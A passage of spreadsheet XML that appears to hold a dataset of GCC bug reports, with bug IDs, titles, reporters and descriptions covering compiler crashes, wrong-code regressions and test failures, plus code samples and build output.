0x8719cc gimplify_expr(tree_node** gimple** gimple** bool (*)(tree_node*) int)
	gcc/gimplify.c:10455
0x87b680 gimplify_modify_expr
	gcc/gimplify.c:4709
0x872210 gimplify_expr(tree_node** gimple** gimple** bool (*)(tree_node*) int)
	gcc/gimplify.c:10162
0x874c46 gimplify_stmt(tree_node** gimple**)
	gcc/gimplify.c:5642
0x87339b gimplify_statement_list
	gcc/gimplify.c:1526
0x87339b gimplify_expr(tree_node** gimple** gimple** bool (*)(tree_node*) int)
	gcc/gimplify.c:10579
0x874c46 gimplify_stmt(tree_node** gimple**)
	gcc/gimplify.c:5642
0x8756bd gimplify_bind_expr
	gcc/gimplify.c:1142
0x871d42 gimplify_expr(tree_node** gimple** gimple** bool (*)(tree_node*) int)
	gcc/gimplify.c:10361
0x874c46 gimplify_stmt(tree_node** gimple**)
	gcc/gimplify.c:5642
0x87339b gimplify_statement_list
	gcc/gimplify.c:1526
0x87339b gimplify_expr(tree_node** gimple** gimple** bool (*)(tree_node*) int)
	gcc/gimplify.c:10579
0x874c46 gimplify_stmt(tree_node** gimple**)
	gcc/gimplify.c:5642
0x872952 gimplify_and_add(tree_node* gimple**)
	gcc/gimplify.c:425
0x872952 gimplify_expr(tree_node** gimple** gimple** bool (*)(tree_node*) int)
	gcc/gimplify.c:10501
0x874c46 gimplify_stmt(tree_node** gimple**)
	gcc/gimplify.c:5642
0x8756bd gimplify_bind_expr
	gcc/gimplify.c:1142
0x871d42 gimplify_expr(tree_node** gimple** gimple** bool (*)(tree_node*) int)
	gcc/gimplify.c:10361
$ gfortran --version
GNU Fortran (GCC) 6.0.0 20160209 (experimental)</t>
  </si>
  <si>
    <t>GCC-52037</t>
  </si>
  <si>
    <t>[4.7 regression] ICE in update_ssa at tree-into-ssa.c:3362 while linking LTO libxul</t>
  </si>
  <si>
    <t>ICE happens during final libxul link in a Firefox LTO build.
 % g++ @testcase -flto=4 -O3
In file included from :2560:0:
/var/tmp/mozilla-central/content/base/src/nsAttrValue.cpp: In member function â€˜Equalsâ€™:
/var/tmp/mozilla-central/content/base/src/nsAttrValue.cpp:689:1: internal compiler error: in update_ssa at tree-into-ssa.c:3362
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
I managed to reduce it from 2770 input files to 17 (but no further) with delta.
 % cat testcase
/var/tmp/mozilla-central/moz-build-dir/toolkit/library/nsUnicharUtils.o
/var/tmp/mozilla-central/moz-build-dir/toolkit/library/../../netwerk/dns/nsIDNService.o
/var/tmp/mozilla-central/moz-build-dir/toolkit/library/../../netwerk/streamconv/converters/nsMultiMixedConv.o
/var/tmp/mozilla-central/moz-build-dir/toolkit/library/../../content/base/src/mozSanitizingSerializer.o
/var/tmp/mozilla-central/moz-build-dir/toolkit/library/../../content/base/src/nsAttrValue.o
/var/tmp/mozilla-central/moz-build-dir/toolkit/library/../../content/base/src/nsContentUtils.o
/var/tmp/mozilla-central/moz-build-dir/toolkit/library/../../content/base/src/nsDocument.o
/var/tmp/mozilla-central/moz-build-dir/toolkit/library/../../content/base/src/nsDocumentEncoder.o
/var/tmp/mozilla-central/moz-build-dir/toolkit/library/../../content/base/src/nsDocumentFragment.o
/var/tmp/mozilla-central/moz-build-dir/toolkit/library/../../content/base/src/nsGenConImageContent.o
/var/tmp/mozilla-central/moz-build-dir/toolkit/library/../../content/base/src/nsGenericElement.o
/var/tmp/mozilla-central/moz-build-dir/toolkit/library/../../content/base/src/nsHTMLContentSerializer.o
/var/tmp/mozilla-central/moz-build-dir/toolkit/library/../../content/base/src/nsImageLoadingContent.o
/var/tmp/mozilla-central/moz-build-dir/toolkit/library/../../xpcom/build/nsCOMPtr.o
/var/tmp/mozilla-central/moz-build-dir/toolkit/library/../../xpcom/string/src/nsReadableUtils.o
/var/tmp/mozilla-central/moz-build-dir/toolkit/library/../../xpcom/string/src/nsSubstring.o
/var/tmp/mozilla-central/moz-build-dir/toolkit/library/../../xpcom/string/src/nsStringComparator.o</t>
  </si>
  <si>
    <t>GCC-36528</t>
  </si>
  <si>
    <t>Cray pointer to function mishandled</t>
  </si>
  <si>
    <t>http://groups.google.com/group/comp.lang.fortran/msg/86b65bad78e6af78
The following program should compile (with -fcray-pointer) and print on run time:
 integral f(x) u intervalu [01] =  0.49975004
 integral f(x) u intervalu [01] =  0.49975004
sunf95 handles this correctly however gfortran fails at link time:
undefined reference to `fcn_'
     pointer (pfcn fcn)
     pfcn = loc(p1) ! p1 is a function interface
        y = y + fcn(x)*dx ! Directly calling p1
     y = euler(0.01.00.0005fcn)
The dump shows:
  integer(kind=8) pfcn
    D.1063 = (integer(kind=8)) p1
    pfcn = D.1063
        y = &lt;&lt;&lt; Unknown tree: call_expr
  4
  (real(kind=4) (*) (real(kind=4) &amp;)) pfcn
  &amp;x &gt;&gt;&gt;
  (&amp;x) * dx +y
    y = euler (
Full source code see link. I think the test was created/tested for ifort and gives there an ICE.</t>
  </si>
  <si>
    <t>GCC-16316</t>
  </si>
  <si>
    <t>ICE in make_decl_rtl</t>
  </si>
  <si>
    <t xml:space="preserve">
compiling with -v -save-temps gives
Reading specs from /usr/local/lib/gcc-lib/powerpc-unknown-linux-gnu/3.2/specs
Configured with: ./configure --enable-languages=c++
Thread model: posix
gcc version 3.2
 /usr/local/lib/gcc-lib/powerpc-unknown-linux-gnu/3.2/cpp0 -lang-c++ -D__GNUG__=3 -D__DEPRECATED -D__EXCEPTIONS -v -D__GNUC__=3 -D__GNUC_MINOR__=2 -D__GNUC_PATCHLEVEL__=0 -D__GXX_ABI_VERSION=102 -DPPC -D__ELF__ -Dpowerpc -D__PPC__ -D__ELF__ -D__powerpc__ -D__PPC -D__powerpc -Acpu=powerpc -Amachine=powerpc -D__NO_INLINE__ -D__STDC_HOSTED__=1 -D_GNU_SOURCE -D_CALL_SYSV -D_BIG_ENDIAN -D__BIG_ENDIAN__ -Amachine=bigendian -D_ARCH_PPC -D__unix__ -D__gnu_linux__ -D__linux__ -Dunix -D__unix -Dlinux -D__linux -Asystem=unix -Asystem=posix t.cpp t.ii
GNU CPP version 3.2 (cpplib) (PowerPC GNU/Linux)
ignoring nonexistent directory NONE/include
ignoring nonexistent directory /usr/local/powerpc-unknown-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/local/include/c++/3.2
 /usr/local/include/c++/3.2/powerpc-unknown-linux-gnu
 /usr/local/include/c++/3.2/backward
 /usr/local/include
 /usr/local/lib/gcc-lib/powerpc-unknown-linux-gnu/3.2/include
 /usr/include
End of search list.
 /usr/local/lib/gcc-lib/powerpc-unknown-linux-gnu/3.2/cc1plus -fpreprocessed t.ii -quiet -dumpbase t.cpp -version -o t.s
GNU CPP version 3.2 (cpplib) (PowerPC GNU/Linux)
GNU C++ version 3.2 (powerpc-unknown-linux-gnu)
	compiled by GNU C version 3.2.
t.cpp: In function `bool max_integer_root(const GiNaC::ex&amp; const 
   GiNaC::symbol&amp; GiNaC::numeric&amp;)':
t.cpp:34: Internal compiler error in make_decl_rtl at varasm.c:835
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Environment:
System: Linux ark 2.2.18pre24 #6 Tue Dec 12 14:39:44 CET 2000 ppc unknown
Architecture: ppc
host: powerpc-unknown-linux-gnu
build: powerpc-unknown-linux-gnu
target: powerpc-unknown-linux-gnu
configured with: ./configure --enable-languages=c++
How-To-Repeat:
preprocessor output is attached</t>
  </si>
  <si>
    <t>GCC-54487</t>
  </si>
  <si>
    <t>[4.8 Regression] profiledbootstrap broken by r190952</t>
  </si>
  <si>
    <t>Breakage varies from bootstrap to bootstrap. Here is an example:
...
In file included from ../../gcc/gcc/config/i386/i386.c:40910:0:
./gt-i386.h: In function â€˜ix86_set_reg_reg_cost(machine_mode)â€™:
./gt-i386.h:168:2: error: corrupted profile info: edge from 39 to 40 exceeds maximal count
 }
  ^
./gt-i386.h:168:2: error: corrupted profile info: edge from 40 to 41 exceeds maximal count
./gt-i386.h:168:2: error: corrupted profile info: edge from 41 to 43 exceeds maximal count
./gt-i386.h:168:2: error: corrupted profile info: edge from 42 to 43 exceeds maximal count
./gt-i386.h:168:2: error: corrupted profile info: profile data is not flow-consistent
./gt-i386.h:168:2: error: corrupted profile info: number of executions for edge 30-42 thought to be -133660
./gt-i386.h:168:2: error: corrupted profile info: number of executions for edge 30-31 thought to be 133660
./gt-i386.h:168:2: error: corrupted profile info: number of iterations for basic block 31 thought to be 267320
./gt-i386.h:168:2: error: corrupted profile info: number of executions for edge 31-32 thought to be 133660
./gt-i386.h:168:2: error: corrupted profile info: number of executions for edge 31-34 thought to be 133660
./gt-i386.h:168:2: error: corrupted profile info: number of iterations for basic block 34 thought to be 244050
./gt-i386.h:168:2: error: corrupted profile info: number of executions for edge 34-35 thought to be 110390
./gt-i386.h:168:2: error: corrupted profile info: number of executions for edge 34-38 thought to be 133660
./gt-i386.h:168:2: error: corrupted profile info: number of iterations for basic block 38 thought to be 226620
./gt-i386.h:168:2: error: corrupted profile info: number of executions for edge 38-39 thought to be 92960
./gt-i386.h:168:2: error: corrupted profile info: number of executions for edge 38-43 thought to be 133660
./gt-i386.h:168:2: error: corrupted profile info: number of executions for edge 39-42 thought to be 92960
./gt-i386.h:168:2: error: corrupted profile info: number of executions for edge 39-40 thought to be 0
./gt-i386.h:168:2: error: corrupted profile info: number of executions for edge 40-42 thought to be 0
./gt-i386.h:168:2: error: corrupted profile info: number of executions for edge 40-41 thought to be 0
./gt-i386.h:168:2: error: corrupted profile info: number of executions for edge 41-42 thought to be 0
./gt-i386.h:168:2: error: corrupted profile info: number of executions for edge 41-43 thought to be 0
make[3]: *** [i386.o] Error 
Happens with (I'm a Gentoo ricer):
make -j4 BOOT_CFLAGS=-march=native -O3 -pipe STAGE1_CFLAGS=-march=native -O3 -pipe CFLAGS_FOR_TARGET=-march=native -O3 -pipe CXXFLAGS_FOR_TARGET=-march=native -O3 -pipe profiledbootstrap
(and
../gcc/configure --prefix=/usr --bindir=/usr/x86_64-pc-linux-gnu/gcc-bin/4.8.0 --includedir=/usr/lib/gcc/x86_64-pc-linux-gnu/4.8.0/include --datadir=/usr/share/gcc-data/x86_64-pc-linux-gnu/4.8.0 --mandir=/usr/share/gcc-data/x86_64-pc-linux-gnu/4.8.0/man --infodir=/usr/share/gcc-data/x86_64-pc-linux-gnu/4.8.0/info --with-gxx-include-dir=/usr/lib/gcc/x86_64-pc-linux-gnu/4.8.0/include/g++-v4 --host=x86_64-pc-linux-gnu --build=x86_64-pc-linux-gnu --disable-altivec --disable-fixed-point --without-ppl --without-cloog --enable-lto --enable-nls --without-included-gettext --with-system-zlib --disable-werror --enable-initfini-array --with-gold --enable-secureplt --disable-multilib --enable-libmudflap --disable-libssp --disable-libgomp --enable-cld --with-python-dir=/share/gcc-data/x86_64-pc-linux-gnu/4.8.0/python --enable-checking=release --disable-libgcj --enable-languages=cc++ --enable-shared --enable-threads=posix --enable-__cxa_atexit --enable-clocale=gnu --with-build-config=bootstrap-lto --with-boot-ldflags=-Wl-O1--hash-style=gnu--as-needed--gc-sections--icf=safe--icf-iterations=3 --enable-version-specific-runtime-libs --disable-libstdcxx-pch --enable-libstdcxx-time=yes
)</t>
  </si>
  <si>
    <t>GCC-60531</t>
  </si>
  <si>
    <t>template function not resolved when comparing functions</t>
  </si>
  <si>
    <t>template  void f()
int main() { f == f }
is rejected with
test.cc: In function â€˜int main()â€™:
test.cc:2:24: error: invalid operands of types â€˜â€™ and â€˜â€™ to binary â€˜operator==â€™
 int main() { f == f }
I see no reason why this would be invalid and it is accepted by all other compilers I was able to test (clang Intel Sun MSVC) but it is rejected by GCC at least as far back as 4.3.</t>
  </si>
  <si>
    <t>GCC-6952</t>
  </si>
  <si>
    <t>gcc 3.1 fails to configure on HP-UX A.09</t>
  </si>
  <si>
    <t>configure fails in gcc-3.1/gcc due to od -c output.
On HP-UX A09 `od -c' lists offset information in decimal by default
but the configure script expects octal numbers.
This breaks the tests for endianness and floating point format.
I am aware that HP A09 is quite old but I thought I report it anyway.
Release:
gcc 3.1
Environment:
HP-UX venus A.09.05 A 9000/712
gcc 3.1
How-To-Repeat:
HP-UX venus A.09.05 A 9000/712
./configure
...
Configuring gcc...
...
checking for CHAR_BIT... yes
checking byte ordering... unknown
configure: error: *** unable to determine endianness</t>
  </si>
  <si>
    <t>ralfixx</t>
  </si>
  <si>
    <t>GCC-77686</t>
  </si>
  <si>
    <t>[6/7 Regression]  wrong code on arm-linux-gnueabi and arm-linux-gnueabihf</t>
  </si>
  <si>
    <t>[forwarded from https://bugs.debian.org/838438]
seen with gcc-6 20160915 and trunk 20160902 (rechecking with newer version) works with g++-5 with -O2 with -O1/-O0 everywhere.
---------------------------8&lt;--------------------------
(sid_armhf-dchroot)jackyf@harris:~/smalltests/small-std-function-arm$ cat hm.cpp
#include 
#include 
struct C
{
        void doCb()
        {
                size_t dummy_a = 1
                std::cout &lt;&lt; Outside:  &lt;&lt; this &lt;&lt; std::endl
                std::function f
                f = [this &amp;dummy_a]()
                {}
                f = [this]()
                {
                        std::cout &lt;&lt; Inside:  &lt;&lt; this &lt;&lt; std::endl
                }
                f()
        }
}
int main()
{
        C c
        c.doCb()
}
$ g++ -O2 -Wall -Wextra hm.cpp &amp;&amp; ./a.out
Outside: 0xffa74b30
Inside: 0xf7356195
$ g++ -O1 -Wall -Wextra hm.cpp &amp;&amp; ./a.out
Outside: 0xff7f0300
Inside: 0xff7f0300
gcc configured with -with-arch=armv7-a --with-fpu=vfpv3-d16 --with-float=hard --with-mode=thumb</t>
  </si>
  <si>
    <t>GCC-79242</t>
  </si>
  <si>
    <t>[7 Regression] ICE in simplify_subreg at simplify-rtx.c:6029</t>
  </si>
  <si>
    <t>Created attachment 40588
Preprocessed source to reproduce ICE
The attached preprocessed source (tester.ii) causes an ICE when built using the current GCC trunk (r244903).
This was discovered trying to build the GCC trunk for the msp430 target with C and C++ support. The attached source is a reduced test case from libstdc++-v3/libsupc++/vec.cc which fails to build because of the same ICE.
Target: msp430-elf
Configured with: ../configure --target=msp430-elf --enable-languages=cc++
gcc version 7.0.1 20170125 (experimental) (GCC)
&gt; msp430-elf-gcc -O0 tester.C                    
tester.C: In function 'std::size_t __cxxabiv1::{anonymous}::compute_size(std::size_t std::size_t)':
tester.C:22:41: internal compiler error: in simplify_subreg at simplify-rtx.c:6029
       if (element_size &amp;&amp; element_count &gt; std::size_t(-1) / element_size)
                           ~~~~~~~~~~~~~~^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
0xcbfbd4 simplify_subreg(machine_mode rtx_def* machine_mode unsigned int)
        ../../gcc/simplify-rtx.c:6029
0xcbff38 simplify_gen_subreg(machine_mode rtx_def* machine_mode unsigned int)
        ../../gcc/simplify-rtx.c:6260
0xca7384 gen_lowpart_general(machine_mode rtx_def*)
        ../../gcc/rtlhooks.c:47
0x9e256f convert_move(rtx_def* rtx_def* int)
        ../../gcc/expr.c:530
0x9e2c39 convert_modes(machine_mode machine_mode rtx_def* int)
        ../../gcc/expr.c:685
0xaf6443 expand_arith_overflow_result_store
        ../../gcc/internal-fn.c:606
0xafb06f expand_mul_overflow
        ../../gcc/internal-fn.c:1887
0xafe1c8 expand_arith_overflow
        ../../gcc/internal-fn.c:2179
0x8d2e27 expand_call_stmt
        ../../gcc/cfgexpand.c:2569
0x8d2e27 expand_gimple_stmt_1
        ../../gcc/cfgexpand.c:3571
0x8d2e27 expand_gimple_stmt
        ../../gcc/cfgexpand.c:3737
0x8d47a1 expand_gimple_basic_block
        ../../gcc/cfgexpand.c:5744
0x8d9d66 execute
        ../../gcc/cfgexpand.c:6357</t>
  </si>
  <si>
    <t>jozef.l</t>
  </si>
  <si>
    <t>GCC-5054</t>
  </si>
  <si>
    <t>[ARM/Thumb] ICE with -mlong-calls</t>
  </si>
  <si>
    <t>Compiler reports an ICE when trying to deal with constant user-defined structures. I extracted the minimal source that gives me an error -- this can be found in the attachment. I use 
unofficial GBA devkit based on GCC 3.0.2 (http://www.io.com/~fenix/devkitadv/)
Release:
gcc version 3.0.2 (DevKit-Advance)
Environment:
AMD Duron 800MhZ 256MB RAM Windows 98 SE
How-To-Repeat:
cc1plus -O -mlong-calls -mthumb A.iicc1plus -O -mlong-calls -mthumb A.ii</t>
  </si>
  <si>
    <t>msinilo</t>
  </si>
  <si>
    <t>GCC-37748</t>
  </si>
  <si>
    <t>[4.4 Regression]: FAIL: gfortran.dg/random_3.f90</t>
  </si>
  <si>
    <t>With revision 140892 I get the following failures in 32 and 64 bit modes:
FAIL: gfortran.dg/random_3.f90  -O0  execution test
FAIL: gfortran.dg/random_3.f90  -O1  execution test
FAIL: gfortran.dg/random_3.f90  -O2  execution test
FAIL: gfortran.dg/random_3.f90  -O3 -fomit-frame-pointer  execution test
FAIL: gfortran.dg/random_3.f90  -O3 -fomit-frame-pointer -funroll-loops  execution test
FAIL: gfortran.dg/random_3.f90  -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions  execution test
FAIL: gfortran.dg/random_3.f90  -O3 -g  execution test
FAIL: gfortran.dg/random_3.f90  -Os  execution test
and revision 140513 was working.</t>
  </si>
  <si>
    <t>GCC-2375</t>
  </si>
  <si>
    <t>static inner class doesn't find inherited methods</t>
  </si>
  <si>
    <t>Sorry if this is a known bug.
Assume you have a class A:
public class A {
  public void m() {
  }
}
and a class B with a static class C
which extends A:
    public class B {
  public void m() {
  }
  public B() {
    C c = new C()
    c.m()
  }
  static public class C extends A {
  }
}           
$ gcj A.java B.java
gives:
B.java: In class `B':
B.java: In method `()':
B.java:8: Can't find method `m()' in type `'. Candidates are:
  `B.m()' in `B'
  `A.m()' in `A'.
      c.m()
       ^
1 error
Release:
unknown
Environment:
linux gcc version 3.0 20010312 (prerelease)</t>
  </si>
  <si>
    <t>joerg_brunsmann</t>
  </si>
  <si>
    <t>GCC-78542</t>
  </si>
  <si>
    <t>[6 Regression] wrong code at -Og results in endless loop</t>
  </si>
  <si>
    <t>Created attachment 40157
reduced testcase
Output:
$ x86_64-pc-linux-gnu-gcc -Og testcase.c -Wno-psabi
$ ulimit -t 5
$ ./a.out 
Killed
$ x86_64-pc-linux-gnu-gcc -v
Using built-in specs.
COLLECT_GCC=/repo/gcc-trunk/binary-latest/bin/x86_64-pc-linux-gnu-gcc
COLLECT_LTO_WRAPPER=/repo/gcc-trunk/binary-trunk-242884-checking-yes-rtl-df-extra-nographite-amd64/bin/../libexec/gcc/x86_64-pc-linux-gnu/7.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: /repo/gcc-trunk//configure --enable-languages=cc++ --enable-valgrind-annotations --disable-nls --enable-checking=yesrtldfextra --without-cloog --without-ppl --without-isl --build=x86_64-pc-linux-gnu --host=x86_64-pc-linux-gnu --target=x86_64-pc-linux-gnu --with-ld=/usr/bin/x86_64-pc-linux-gnu-ld --with-as=/usr/bin/x86_64-pc-linux-gnu-as --disable-libstdcxx-pch --prefix=/repo/gcc-trunk//binary-trunk-242884-checking-yes-rtl-df-extra-nographite-amd64
Thread model: posix
gcc version 7.0.0 20161125 (experimental) (GCC) 
It seems that the x = 1 assignment is not present in the generated code.
Tested revisions:
trunk r242884 - FAIL
6-branch r242029 - OK</t>
  </si>
  <si>
    <t>GCC-40758</t>
  </si>
  <si>
    <t>[LTO] ICE in partition_view_bitmap at tree-ssa-live.c:331</t>
  </si>
  <si>
    <t>I found this one testing arm but it is reproducible with i686-pc-linux-gnu as well.
ryan@ryan:~/gcc/lto/x86-build/gcc$ ./xgcc -v
Using built-in specs.
COLLECT_GCC=./xgcc
Target: i686-pc-linux-gnu
Configured with: ../configure --enable-languages=c --enable-lto --disable-bootstrap
Thread model: posix
gcc version 4.5.0 20090714 (experimental) [lto revision 149644] (lto merged with rev 149625)
ryan@ryan:~/gcc/lto/x86-build/gcc$ ./xgcc -B. ice.i -c -O -flto
ryan@ryan:~/gcc/lto/x86-build/gcc$ ./xgcc -B.  -shared  ice.o  -flto
In file included from :441:0:
ice.i: In function Ã¢ffb_ctx_scaled_blitÃ¢:
ice.i:4515:1: internal compiler error: in partition_view_bitmap at tree-ssa-live.c:331
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
lto-wrapper: ././xgcc returned 1 exit status
collect2: lto-wrapper returned 1 exit status</t>
  </si>
  <si>
    <t>GCC-80694</t>
  </si>
  <si>
    <t>[8 regression] test cases gcc.dg/vect/vect-44.c and vect-50.c fail starting with r247780</t>
  </si>
  <si>
    <t>r247780 updated (well reverted) these two test cases and now they are failing on powerpc64le.
spawn /home/seurer/gcc/build/gcc-test/gcc/xgcc -B/home/seurer/gcc/build/gcc-test/gcc/ /home/seurer/gcc/gcc-test/gcc/testsuite/gcc.dg/vect/vect-50.c -fno-diagnostics-show-caret -fdiagnostics-color=never -maltivec -mpower8-vector -ftree-vectorize -fno-vect-cost-model -fno-common -O2 -fdump-tree-vect-details -lm -o ./vect-50.exe
PASS: gcc.dg/vect/vect-50.c (test for excess errors)
Setting LD_LIBRARY_PATH to :/home/seurer/gcc/build/gcc-test/gcc::/home/seurer/gcc/build/gcc-test/gcc:/home/seurer/gcc/build/gcc-test/./gmp/.libs:/home/seurer/gcc/build/gcc-test/./prev-gmp/.libs:/home/seurer/gcc/build/gcc-test/./mpfr/src/.libs:/home/seurer/gcc/build/gcc-test/./prev-mpfr/src/.libs:/home/seurer/gcc/build/gcc-test/./mpc/src/.libs:/home/seurer/gcc/build/gcc-test/./prev-mpc/src/.libs:/home/seurer/gcc/build/gcc-test/./isl/.libs:/home/seurer/gcc/build/gcc-test/./prev-isl/.libs:/home/seurer/gcc/install/gcc-6.2.0/lib64
spawn [open ...]
PASS: gcc.dg/vect/vect-50.c execution test
PASS: gcc.dg/vect/vect-50.c scan-tree-dump-times vect vectorized 1 loops 1
FAIL: gcc.dg/vect/vect-50.c scan-tree-dump-times vect Vectorizing an unaligned access 2
FAIL: gcc.dg/vect/vect-50.c scan-tree-dump-times vect Vectorizing an unaligned access 2
FAIL: gcc.dg/vect/vect-50.c scan-tree-dump-times vect Alignment of access forced using peeling 1
Executing on host: /home/seurer/gcc/build/gcc-test/gcc/xgcc -B/home/seurer/gcc/build/gcc-test/gcc/ /home/seurer/gcc/gcc-test/gcc/testsuite/gcc.dg/vect/vect-50.c  -fno-diagnostics-show-caret -fdiagnostics-color=never  -flto -ffat-lto-objects -maltivec -mpower8-vector -ftree-vectorize -fno-vect-cost-model -fno-common -O2 -fdump-tree-vect-details  -lm    -o ./vect-50.exe    (timeout = 300)
spawn /home/seurer/gcc/build/gcc-test/gcc/xgcc -B/home/seurer/gcc/build/gcc-test/gcc/ /home/seurer/gcc/gcc-test/gcc/testsuite/gcc.dg/vect/vect-50.c -fno-diagnostics-show-caret -fdiagnostics-color=never -flto -ffat-lto-objects -maltivec -mpower8-vector -ftree-vectorize -fno-vect-cost-model -fno-common -O2 -fdump-tree-vect-details -lm -o ./vect-50.exe
PASS: gcc.dg/vect/vect-50.c -flto -ffat-lto-objects (test for excess errors)
Setting LD_LIBRARY_PATH to :/home/seurer/gcc/build/gcc-test/gcc::/home/seurer/gcc/build/gcc-test/gcc:/home/seurer/gcc/build/gcc-test/./gmp/.libs:/home/seurer/gcc/build/gcc-test/./prev-gmp/.libs:/home/seurer/gcc/build/gcc-test/./mpfr/src/.libs:/home/seurer/gcc/build/gcc-test/./prev-mpfr/src/.libs:/home/seurer/gcc/build/gcc-test/./mpc/src/.libs:/home/seurer/gcc/build/gcc-test/./prev-mpc/src/.libs:/home/seurer/gcc/build/gcc-test/./isl/.libs:/home/seurer/gcc/build/gcc-test/./prev-isl/.libs:/home/seurer/gcc/install/gcc-6.2.0/lib64
spawn [open ...]
PASS: gcc.dg/vect/vect-50.c -flto -ffat-lto-objects execution test
PASS: gcc.dg/vect/vect-50.c -flto -ffat-lto-objects  scan-tree-dump-times vect vectorized 1 loops 1
FAIL: gcc.dg/vect/vect-50.c -flto -ffat-lto-objects  scan-tree-dump-times vect Vectorizing an unaligned access 2
FAIL: gcc.dg/vect/vect-50.c -flto -ffat-lto-objects  scan-tree-dump-times vect Vectorizing an unaligned access 2
FAIL: gcc.dg/vect/vect-50.c -flto -ffat-lto-objects  scan-tree-dump-times vect Alignment of access forced using peeling 1
testcase /home/seurer/gcc/gcc-test/gcc/testsuite/gcc.dg/vect/vect.exp completed in 1 seconds
		=== gcc Summary ===
# of expected passes		6
# of unexpected failures	6</t>
  </si>
  <si>
    <t>GCC-8581</t>
  </si>
  <si>
    <t>assert distracts -Wunreachable-code in g++-3.2</t>
  </si>
  <si>
    <t>the option -Wunreachable-code gives me wrong warnings about
unreachable code after some assert(...) statements with g++-3.2 but not with g++-3.0
example see attachment
Release:
3.2.1
Environment:
Linux glibc2 Debian
How-To-Repeat:
g++-3.2 -Wunreachable-code testit.c</t>
  </si>
  <si>
    <t>michael.pronath</t>
  </si>
  <si>
    <t>GCC-55999</t>
  </si>
  <si>
    <t>gcc 4.7.2 -O2  -floop-parallelize-all generates incorrect code</t>
  </si>
  <si>
    <t>struct s {
    int8_t num c
    int8_t xs[4] ys[4]
}
void stuff(struct s *desc)
{
    int n
    for (n = 0 n num n++) {
        desc-&gt;xs[n] = (n == 1 || n == 2) ? desc-&gt;c : 0
        desc-&gt;ys[n] = (n == 1 || n == 2) ? desc-&gt;c : 0
    }
}
desc-&gt;xs[0] is not 0 after calling this function although it should be.
The attached log was generated with gcc -v -save-temps  gcc_issue.c gcc_issue_main.c -Wall -Wextra -O2  -floop-parallelize-all  &gt; log.txt 2&gt;&amp;1
The assert in gcc_issue_main.c should not be triggered (and is not triggered when removing -O2 or -floop-parallelize-all).</t>
  </si>
  <si>
    <t>GCC-53802</t>
  </si>
  <si>
    <t>Spurious 'may be used uninitialized' related to shifts</t>
  </si>
  <si>
    <t>Trivial changes in the following program suppress the warning:
inline void foo(const unsigned char* mem_ unsigned int* value_)
{
  unsigned int value = *mem_
  value &lt;&lt;= 8
  value |= *++mem_
  value &lt;&lt;= 8
  value |= *++mem_
  value &lt;&lt;= 8
  value |= *++mem_
  value &lt;&lt;= 8
  value |= *++mem_
  *value_ = value
}
inline void bar(unsigned char* dest_ unsigned int value_)
{
  if (!value_)
    return
  dest_[0] = 0
  dest_[1] = value_ &gt;&gt; 24
  dest_[2] = value_ &gt;&gt; 16
  dest_[3] = value_ &gt;&gt; 8
  dest_[4] = value_
}
int main()
{
  for (unsigned int number = 0xFFFFFFFF number number &gt;&gt;= 1)
  {
    unsigned char buf[5]
    bar(buf number)
    unsigned int val
    foo(buf 
    if (number != val)
      return 0
  }
}
$ gcc main.cpp -O -Wall
main.cpp: In function 'int main()':
main.cpp:6:19: warning: '*((void*)&amp; buf +1)' may be used uninitialized in this function [-Wmaybe-uninitialized]
main.cpp:31:19: note: '*((void*)&amp; buf +1)' was declared here
main.cpp:12:19: warning: '*((void*)&amp; buf +4)' may be used uninitialized in this function [-Wmaybe-uninitialized]
main.cpp:31:19: note: '*((void*)&amp; buf +4)' was declared here
main.cpp:10:19: warning: '*((void*)&amp; buf +3)' may be used uninitialized in this function [-Wmaybe-uninitialized]
main.cpp:31:19: note: '*((void*)&amp; buf +3)' was declared here
main.cpp:8:19: warning: '*((void*)&amp; buf +2)' may be used uninitialized in this function [-Wmaybe-uninitialized]
main.cpp:31:19: note: '*((void*)&amp; buf +2)' was declared here</t>
  </si>
  <si>
    <t>lukeocamden</t>
  </si>
  <si>
    <t>GCC-23953</t>
  </si>
  <si>
    <t>using stringstreams causes crashes with some locales</t>
  </si>
  <si>
    <t>The attached codesnippet (test.cc) will segfault when using the nl_BE locale.
Although i can't confirm it i have heard it migth also fail with some other locales.
------------------------------------
$ g++ -v -save-temps test.cc
Reading specs from /usr/lib/gcc/i686-pc-linux-gnu/3.4.4/specs
Configured with: /var/tmp/portage/gcc-3.4.4-r1/work/gcc-3.4.4/configure
--prefix=/usr --bindir=/usr/i686-pc-linux-gnu/gcc-bin/3.4.4
--includedir=/usr/lib/gcc/i686-pc-linux-gnu/3.4.4/include
--datadir=/usr/share/gcc-data/i686-pc-linux-gnu/3.4.4
--mandir=/usr/share/gcc-data/i686-pc-linux-gnu/3.4.4/man
--infodir=/usr/share/gcc-data/i686-pc-linux-gnu/3.4.4/info
--with-gxx-include-dir=/usr/lib/gcc/i686-pc-linux-gnu/3.4.4/include/g++-v3
--host=i686-pc-linux-gnu --build=i686-pc-linux-gnu --disable-altivec
--enable-nls --without-included-gettext --with-system-zlib --disable-checking
--disable-werror --disable-libunwind-exceptions --disable-multilib
--disable-libgcj --enable-languages=cc++ --enable-shared --enable-threads=posix
--enable-__cxa_atexit --enable-clocale=gnu
Thread model: posix
gcc version 3.4.4 (Gentoo 3.4.4-r1 ssp-3.4.4-1.0 pie-8.7.8)
 /usr/libexec/gcc/i686-pc-linux-gnu/3.4.4/cc1plus -E -quiet -v -D_GNU_SOURCE
test.cc -mtune=pentiumpro -o test.ii
ignoring nonexistent directory /usr/local/include
ignoring nonexistent directory
/usr/lib/gcc/i686-pc-linux-gnu/3.4.4/../../../../i686-pc-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/lib/gcc/i686-pc-linux-gnu/3.4.4/include/g++-v3
 /usr/lib/gcc/i686-pc-linux-gnu/3.4.4/include/g++-v3/i686-pc-linux-gnu
 /usr/lib/gcc/i686-pc-linux-gnu/3.4.4/include/g++-v3/backward
 /usr/lib/gcc/i686-pc-linux-gnu/3.4.4/include
 /usr/include
End of search list.
 /usr/libexec/gcc/i686-pc-linux-gnu/3.4.4/cc1plus -fpreprocessed test.ii -quiet
-dumpbase test.cc -mtune=pentiumpro -auxbase test -version -o test.s
